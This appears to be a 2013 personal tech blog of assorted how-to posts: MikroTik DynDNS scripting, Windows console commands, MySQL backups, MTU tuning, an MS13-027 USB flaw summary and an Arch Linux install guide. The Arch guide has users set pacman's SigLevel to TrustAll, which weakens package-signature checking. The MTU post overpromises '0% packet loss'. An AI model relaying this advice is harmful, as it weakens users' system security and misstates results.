/tool fetch user=$username password=$password mode=http address="members.dyndns.org" \
src-path="/nic/update?hostname=$hostname&myip=$currentIP" dst-path="/dyndns.txt"
:local result [/file get dyndns.txt contents]
:log info ("UpdateDynDNS: Dyndns update needed")
:log info ("UpdateDynDNS: Dyndns Update Result: ".$result)
:put ("Dyndns Update Result: ".$result)
} else={
:log info ("UpdateDynDNS: No dyndns update needed")
}
After we save the script, we have to add a new scheduled job that runs the script we just made, with an interval of, let's say, 15 minutes?

Now you can 'remote access' easily.

Tuesday, April 9, 2013

Kali linux - No action for laptop lid

So I was trying to figure out the actions of my laptop's lid without going the deep terminal way again... After a long search nothing seemed to be working; I tried several tools but none of them were actually changing the action of the lid.
So after some days I came across the gnome-tweak-tool, which I've already used in the past and which now turns out to be really helpful...

apt-get install gnome-tweak-tool && gnome-tweak-tool

Under Shell you should be able to find:
'Laptop lid close action on battery'
'Laptop lid close action when on AC'

Again, this is a bug found in some hardware, if you haven't found the option in the menu then try this.

Useful console commands for Windows

Here is a list of console commands for almost any version of Windows:

Accessibility Options: access.cpl
Add Hardware: hdwwiz.cpl
Add / Remove Programs: appwiz.cpl
Administrative Tools: control admintools
Automatic Updates: wuaucpl.cpl
Bluetooth File Transfer Wizard: fsquirt
Calculator: calc
Certificate Manager: certmgr.msc
Character Map: charmap
Check Disk: chkdsk
Clipboard Viewer: clipbrd
Command Prompt: cmd
Component Services (DCOM): dcomcnfg
Computer Management: compmgmt.msc
DDE active sharing: ddeshare
Device Manager: devmgmt.msc
DirectX Control Panel (if installed): directx.cpl
DirectX Diagnostic Utility: dxdiag
Disk Cleanup: cleanmgr
Disk Defragmenter: dfrg.msc
Disk Management: diskmgmt.msc
Partition manager: diskpart
Display Properties: control desktop
Display Properties (2): desk.cpl
Display Properties ("Appearance" tab): control color
Driver Verifier Manager: verifier
Event Viewer: eventvwr.msc
File Signature Verification: sigverif
Findfast (if present): findfast.cpl
Folder Options: control folders
Fonts: control fonts
Windows Fonts folder: fonts
Group Policy: gpedit.msc
Internet Properties : inetcpl.cpl
IP Configuration: ipconfig
Keyboard Properties: control keyboard
Local Security Settings: secpol.msc
Local Users and Groups: lusrmgr.msc
Logout: logoff
Mouse Properties: main.cpl or control mouse
Network Connections: ncpa.cpl
Notepad : notepad
On-Screen Keyboard: osk
Performance Monitor: perfmon.msc
Power Options: powercfg.cpl
Printers and Faxes: control printers
Regional and Language Options: intl.cpl
Registry Editor: regedit
Remote desktop connection: mstsc
Security Center: wscui.cpl
Services management console: services.msc
Shared folders: fsmgmt.msc
System Configuration Utility : msconfig
System File Checker (scan now): sfc /scannow
SFC (scan at next startup): sfc /scanonce
SFC (scan at every startup): sfc /scanboot
SFC (back to default settings): sfc /revert
SFC (purge cache files): sfc /purgecache
SFC (set cache size to x): sfc /cachesize=x
System Properties: sysdm.cpl
Task Manager: taskmgr
Telnet client: telnet
Windows firewall: firewall.cpl
Windows Management Infrastructure: wmimgmt.msc
Protection of the accounts database: syskey
Date and Time Properties: timedate.cpl

Commands for scripting or fast editing some pesky things... hf.

Sunday, April 7, 2013

Backup - Restore MySQL databases easily

Working in IT, you will run into plenty of computers running MySQL that you would like to look after, or get more out of, without poking around the filesystem with no plan...
Let's say you hack into a system and all you're after is their database! Hah, I am kidding. Still, we would like to back up this database for security reasons... What's the fast way? And how can we do this in a script?


Below are some commands that may be handy from time to time for those who don't already know them.


Backup MySQL Database
# mysqldump -u(username) -p(password) (databasename) > (dumpfile.sql)

Backup all MySQL Databases
# mysqldump -u(username) -p(password) --all-databases > (dumpfile.sql)

Backup a Remote MySQL Database
# mysqldump -h(hostip) -u(username) -p(password) (databasename) > (dumpfile.sql)

Restore MySQL Database
# mysql -u(username) -p(password) (databasename) < (dumpfile.sql)

Restore a database that already exists on the target machine
# mysql -u(username) -p(password) (databasename) < (dumpfile.sql)
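
The commands above pass the password with -p(password), where it can be visible to other local users in the process list and ends up in shell history. As an added example (not part of the original post), this sh script answers the "in a script" question while keeping the password in an owner-only option file; the function names, paths and retention handling are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and paths are
# hypothetical; MYSQLDUMP can point at a different mysqldump binary.
MYSQLDUMP=${MYSQLDUMP:-mysqldump}

# Create a client option file that only its owner can read.
# $1 = file path, $2 = user; the password is read from stdin so that it
# never appears as a command-line argument.
write_optfile() {
    IFS= read -r pw || return 1
    (
        umask 077
        printf '[client]\nuser=%s\npassword="%s"\n' "$2" "$pw" > "$1"
    )
}

# Dump one database to a dated, owner-only file and print the file's path.
# $1 = option file, $2 = database name, $3 = backup directory
backup_db() {
    optfile=$1 db=$2 dir=$3
    out="$dir/$db-$(date +%Y%m%d-%H%M%S).sql"
    mkdir -p "$dir" || return 1
    (
        umask 077
        # --defaults-extra-file must be the first option on the command line.
        "$MYSQLDUMP" --defaults-extra-file="$optfile" \
            --single-transaction --routines "$db" > "$out.part"
    ) || { rm -f "$out.part"; return 1; }
    # Only a complete dump gets the final name.
    mv "$out.part" "$out" && printf '%s\n' "$out"
}

# Delete dumps older than $2 days from directory $1.
prune_backups() {
    find "$1" -type f -name '*.sql' -mtime +"$2" -exec rm -f {} +
}

# Usage (hypothetical paths):
#   write_optfile /root/.backup.cnf backupuser    # type the password, Enter
#   backup_db /root/.backup.cnf shop /var/backups/mysql
#   prune_backups /var/backups/mysql 14
```

Restore with the same option file: mysql --defaults-extra-file=(optionfile) (databasename) < (dumpfile.sql).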

Saturday, March 30, 2013

Five reasons you should never work as an IT for free

We've all done it. A friend, a neighbor, a relative, a good client, a bad client, a pretty girl... Whoever it was, and for whatever reason, we all threw them a technological bone and fixed something for free. In rare instances, it can be a rewarding experience. Perhaps your buddy gave you a beer. Maybe someone said thank you. Maybe there was a smile on their face, and that was rewarding enough.

More likely, however, that five minute task you thought you were signing up for turned into 40 minutes, then an hour, then a commitment. Wow. You didn't see that coming.


You Break it You Bought it.
When you sit down to fix a problem that presented as a simple one you are creating a contract. Not a legal contract, but a social one. The computer owner is trusting their computer with you. It's their baby, and you're the doctor. So you sit down, and begin to fix a problem.
In the process, something else breaks. You fixed one thing, but something else goes awry. What's the best part? Neither you nor the user notice it is broken until a day later when they call you to blame you for breaking something else.
"I thought you were going to fix it." They complain.
This is the primary reason you charge money to fix something. You break it, you bought it. The user / owner will expect you to warranty your service even though THEY received all the value of your time, and you received nothing in exchange.

People don't respect things that are free.
I learned that quote from a man who runs a non-profit organization. Imagine that. A man who solicits donations for a living candidly told me "people don't respect things that are free." You know what? He's right. Free advice. Free upgrade. Free entry. None are valued. Free advice is seldom wanted. Free upgrade was something you were going to get anyway. Free entry? The band playing tonight must not be any good. People associate the value of service with the amount of money that is exchanged for it. How else do you think that lawyer can get away with charging $400 an hour? People naturally make the assumption that if it costs an arm and a leg, then it must be worth it. So, if customers and friends will assume that the most expensive car is the best one, what will they assume of the free car? Do you want the heart surgeon who charges $500,000 per surgery or the one who works for beer to operate on your mother?

They will expect it forever.
In law, the concept of a precedent is vitally important. Judges and lawyers look to previous cases to decide what the interpretation of the law was because if a case was settled one way before, chances are, it will be settled that way again. Gamblers playing craps look at the past behavior of the dice to, mistakenly, assume that the good luck will continue. Users will figure if you fixed it once for free, you'll do it forever for free. There is no reason why they should respect the thousands of hours you have spent learning and researching the art of computer science. There is no reason that they should respect the certifications you hold. There is no reason that they should honor your abilities by paying your fees. Why? Because you did it for free. Once!
When they come back and you try to get fees, they will meet you with resistance in the form of guilt. "I thought we were friends" they cry. "You didn't charge me anything last time." They argue.
Set up the expectation that they are going to pay (or barter) from the onset. Demand the respect that you deserve. Make sure they understand you are a professional. After all, that is the difference between a professional and an amateur. Professionals get compensated for their skills.

The demands will only grow with time.
Give them an inch, and they will take you through three operating system upgrades, two virus infections, and a crashed hard drive. Once you've set the precedent and created the expectation that you are their knight in shining armor, they will begin to call you for everything. They will suck up your time and resources. They will not be grateful. They will involve you in 30 minute hypothetical conversations then disagree with your expertise.

It Weakens Your Backbone
Working for free is not only unprofitable, it weakens your constitution as a professional consultant. For many consultants, asking for money is difficult. They email out a silent invoice after the fact and hope they get paid. This practice can lead to unbalanced books, debt, and a going out of business sign. The simple fact is: if you don't ask for your money, you're not going to get paid. No one just hands out checks. Setting up the expectation, especially when you fix a computer for the first time for a client, is vitally important in establishing boundaries that ensure you are paid in a timely fashion. Working for free, throwing out freebies, "comp"-ing your time hurts your ability to ask for the sale. It hurts your credibility because the client will assume that if you're not charging them for a given task, you didn't know what you were doing or you made mistakes.
It may give you butterflies, but ask for the money. Do it openly and notoriously. Your clients will take it as a sign of confidence.

Taken from http://www.experts-exchange.com/ .

Thursday, March 28, 2013

Looking for Windows Explorer tabs? Then use this

Clover is an extension for Windows Explorer that adds multi-tab functionality similar to the Google Chrome browser. After installing Clover, you can open multiple folders within the same window, and you can also add folder bookmarks.

Clover works on Windows XP, 7 and 8.


Convenient Tab page
Just remember Ctrl + T to open a tab, Ctrl + W to close it and Ctrl + Tab to switch between tabs, and your work efficiency will more than double!

Seamless integration with operating system
Clover is a BHO plug-in integrated into Windows Explorer, so you keep your usual habits and can use it immediately without having to learn new software.

Lightning-fast bookmarks bar
Press Ctrl + D to add the current path, or drag a folder onto the bookmarks bar. No more hunting around for the folder you want to open: it is instantly within reach!


Monday, March 25, 2013

How to reduce or even remove packet loss in games

Back after a good day here in my SOHO, today I feel like posting a networking thread. So I'm gaming (everyone games somehow), and with high packet loss comes a high ping, an unplayable game, and rage!


How to minimise or remove packet loss completely?


There's a setting called the MTU (Maximum Transmission Unit), which is set to 1500 by default on any system (unless jumbo frames are in use). It limits the size of the packets sent across the network: a single packet carries up to 1500 bytes.
 - With jumbo frames that can go up to 9000, but that's another story. So why don't we go and check our current packet loss?


I'll pick google.com for now; you can pick your game server or anything else you connect to that needs some tweaking.

Run a command prompt as Administrator and type:
netsh interface ipv4 show subinterfaces
After it runs you will see a table showing your current MTU size, which by default should be 1500. Be sure to look at the row for the connection you are actually using.

As you noticed, it's 1500, so let's now test whether that size actually gets through or whether the real limit is a bit lower...
ping google.com -f -l 1472
Here -f sets the Don't Fragment flag and -l sets the payload size. Why 1472? Because 28 bytes of the packet are IP/ICMP header overhead.

example of fragmented packets

Now, if your ping was successful (that means you saw a reply), then you're good to go!

But what if you see "Packet needs to be fragmented but DF set"?
Your packets are too big to get through without being fragmented, so reduce the size given to -l until you reach a successful ping.

I am getting replies with a lower size, now what?
Let's say I get replies once the size is down to 1423; memorize this number and add 28 to get the MTU.
Then:
netsh interface ipv4 set subinterface "Your connection name here" mtu=1451 store=persistent
"Your connection name here" should be Local Area Connection (the interface name listed by the show subinterfaces command above).

That was it; now you are set to go with 0% packet loss after restarting your computer.
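
The trial-and-error search above can be automated. This added example (not from the original post) binary-searches the largest payload that passes with Don't Fragment set and adds the 28 header bytes; probe() assumes the Linux iputils ping flags -M do and -s, the counterpart of ping -f -l, and the 548-byte lower bound is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post. probe() assumes Linux iputils
# ping; on Windows the equivalent test is: ping HOST -f -l SIZE -n 1

# Succeeds when one ping with payload $2 and Don't Fragment set reaches $1.
probe() {
    ping -c 1 -W 2 -M do -s "$2" "$1" >/dev/null 2>&1
}

# Print the largest ICMP payload between $2 and $3 that gets through
# unfragmented; return 1 when even the smallest size fails (host down,
# ICMP filtered), so a dead link is never reported as a tiny MTU.
max_payload() {
    host=$1 lo=$2 hi=$3
    probe "$host" "$lo" || return 1
    # Invariant: size lo works, every size above hi fails or is out of range.
    while [ "$lo" -lt "$hi" ]; do
        mid=$(( (lo + hi + 1) / 2 ))
        if probe "$host" "$mid"; then
            lo=$mid
        else
            hi=$(( mid - 1 ))
        fi
    done
    printf '%s\n' "$lo"
}

# MTU = payload + 20 bytes IPv4 header + 8 bytes ICMP header.
# $1 = host, $2 = smallest payload to try (assumed default 548),
# $3 = largest payload to try (1472, i.e. a 1500-byte MTU)
path_mtu() {
    p=$(max_payload "$1" "${2:-548}" "${3:-1472}") || return 1
    printf '%s\n' "$(( p + 28 ))"
}

# Usage: path_mtu google.com
```

With the numbers from the post (replies up to a size of 1423), path_mtu prints 1451, the value passed to netsh.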


Saturday, March 16, 2013

Kali linux is here, deep penetration mode.


The most advanced penetration testing distribution, ever.


From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system. With all this buzz, you might be asking yourself:

What's new ?


Grab it !

USB flaw could allow bypassing security controls

MS13-027 is rated as "important" because the attack requires physical access to the vulnerable machine.

This flaw allows anyone with a USB thumb drive loaded with the payload to bypass security controls and access a vulnerable system even if AutoRun is disabled and the screen is locked. The flaw exposes your Windows PCs to major risk. If you remember Stuxnet, that worm was introduced into Iran's nuclear program systems using a USB thumb drive.
Windows typically discovers USB devices when they are inserted or when they change power sources (if they switch from plugged-in power to being powered off of the USB connection itself).

To exploit the vulnerability an attacker could add a maliciously formatted USB device to the system. When the Windows USB device drivers enumerate the device, parsing a specially crafted descriptor, the attacker could cause the system to execute malicious code in the context of the Windows kernel.

Because the vulnerability is triggered during device enumeration, no user intervention is required. In fact, the vulnerability can be triggered when the workstation is locked or when no user is logged in, making this an un-authenticated elevation of privilege for an attacker with casual physical access to the machine.

Microsoft admits the flaw could "open additional avenues of exploitation that do not require direct physical access to the system," once the USB-based exploit is successful.

The vulnerabilities addressed by Microsoft do not include those exploited by security researchers at the recent Pwn2Own hacking competition at the CanSecWest Conference in Vancouver.

Saturday, January 26, 2013

How to: Install base ArchLinux, made simple


**I won't describe how to boot from usb/cd - just keep using another OS mate, :p

create partitions:
cfdisk /dev/sda
confirm partition:
fdisk -l /dev/sda
format partition:
mkfs.ext4 /dev/sda1 -L rootfs
mkswap /dev/sda2 -L swapfs
mount the first partition:
mount /dev/sda1 /mnt
check if you have internet connectivity using dhcp:
ip a
ip r
or else add static:
ip addr add 10.0.0.10/24 dev eth0
ip route add default via 10.0.0.200 dev eth0
confirm networking:
ip a
ip r
prepare rootfs:
mkdir -pv /mnt/var/lib/pacman
and install arch:
mkdir -pv /mnt//var/cache/pacman/pkg/
pacman -r /mnt --cachedir /mnt//var/cache/pacman/pkg/ -Sy base
sign keys:
rsync -rav /etc/pacman.d/gnupg/ /mnt/etc/pacman.d/gnupg/
bind mnt and change root:
mount --bind /dev /mnt/dev
mount --bind /sys /mnt/sys
mount --bind /proc /mnt/proc
chroot /mnt /bin/bash
edit fstab or use blkid:
nano /etc/fstab
/dev/sda1    /       ext4     defaults    0    1
/dev/sda2    none swap   defaults    0    1
change hostname:
echo ArchLinux > /etc/hostname
timezone and locale:
ln -s /usr/share/zoneinfo/Europe/Athens /etc/localtime
nano /etc/locale.gen and uncomment el_GR.UTF-8 etc...
locale-gen
create initramfs:
mkinitcpio -p linux
install grub:
grub-install --boot-directory=/mnt/boot /dev/sda
create grub.cfg:
grub-mkconfig -o /mnt/boot/grub/grub.cfg
add a menuentry:
nano /mnt/boot/grub/grub.cfg
eg:
menuentry "ArchLinux" {

    set root=(hd0,1)
    linux /boot/vmlinuz-linux root=/dev/sda1
    initrd /boot/initramfs-linux.img
}
reboot!
login and change root pwd:

passwd
---------
Up to here you should have a system running; if not, please refer to the Beginners' Guide.
---------
Some problems during installation:

  1. eth0 renames to some sort of enp2s1 or so - it's a bug (search tracker):
    You should rename enp2s1 to lan or something, how?
    nano /etc/udev/rules.d/10-network.rules
    then add:
     
    SUBSYSTEM=="net", ATTR{address}=="00:00:00:00:00:00", NAME="lan"
    then edit your network.service file so that your network service waits until the interface has been renamed:
    Requires=systemd-udev-settle.service
    After=systemd-udev-settle.service
    reboot - now you should see that the eth0 dhcpcd service failed to start:
    rm /etc/systemd/system/multi-user.target.wants/dhcpcd@eth0.service
    to stop the eth0 service from starting at boot.
  2. Key signatures bypass:
    nano /etc/pacman.d/gnupg/gpg.conf
    change keyserver to:
    hkp://pgp.mit.edu:11371
    then run this to get the keys:
    curl https://www.archlinux.org/{developers,trustedusers}/ |awk -F\" '(/pgp.mit.edu/) {sub(/.*search=0x/,"");print $1}' |xargs pacman-key --recv-keys
    after this:
    nano /etc/pacman.conf
    and change SigLevel to TrustAll, or else an untrusted-source error will occur.
---------
Up to here you should have a stable but somewhat insecure system running.
---------
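
One way to see which signature settings are making the system less secure at this point, as an added example that is not part of the original post: the script lists every SigLevel token in a pacman.conf that turns checking off or accepts unsigned or untrusted packages, so it can be reverted once the keyring works. The function names and the sample file are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: report pacman.conf signature
# settings that weaken package verification. Function names are hypothetical.

# Print "section directive value" for every weak SigLevel token in file $1.
# Returns 1 when at least one weak token is found, 0 otherwise.
audit_siglevel() {
    awk '
        /^[ \t]*#/ { next }                      # comment line
        /^[ \t]*\[/ {                            # section header, e.g. [core]
            sec = $1; gsub(/\[|\]/, "", sec); next
        }
        /^[ \t]*(LocalFile|RemoteFile)?SigLevel[ \t]*=/ {
            name = $0; sub(/[ \t]*=.*/, "", name); sub(/^[ \t]*/, "", name)
            val = $0;  sub(/^[^=]*=/, "", val)
            n = split(val, tok, " ")
            for (i = 1; i <= n; i++) {
                # Never: nothing is checked. TrustAll: the signing key only
                # has to be in the keyring, not trusted. Optional: unsigned
                # packages are accepted. DatabaseOptional is the stock value.
                if (tok[i] ~ /^(Package|Database)?(Never|TrustAll)$/ ||
                    tok[i] ~ /^(Package)?Optional$/) {
                    print sec, name, tok[i]
                    found = 1
                }
            }
        }
        END { exit found + 0 }
    ' "$1"
}

# Constructed sample: [options] carries the setting from the post, [core]
# keeps the stock value, [custom] relaxes checking for one repository.
write_sample_conf() {
    cat > "$1" <<'EOF'
[options]
Architecture = auto
#SigLevel = Never
SigLevel = TrustAll

[core]
SigLevel = Required DatabaseOptional
Include = /etc/pacman.d/mirrorlist

[custom]
SigLevel = Optional TrustAll
Server = file:///srv/repo
EOF
}

# Usage: audit_siglevel /etc/pacman.conf || echo "weak SigLevel settings found"
```
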
Now install xorg:
pacman -Sy xorg
then kde:
pacman -Sy kde
reboot and start kde:
kdm

:) hf.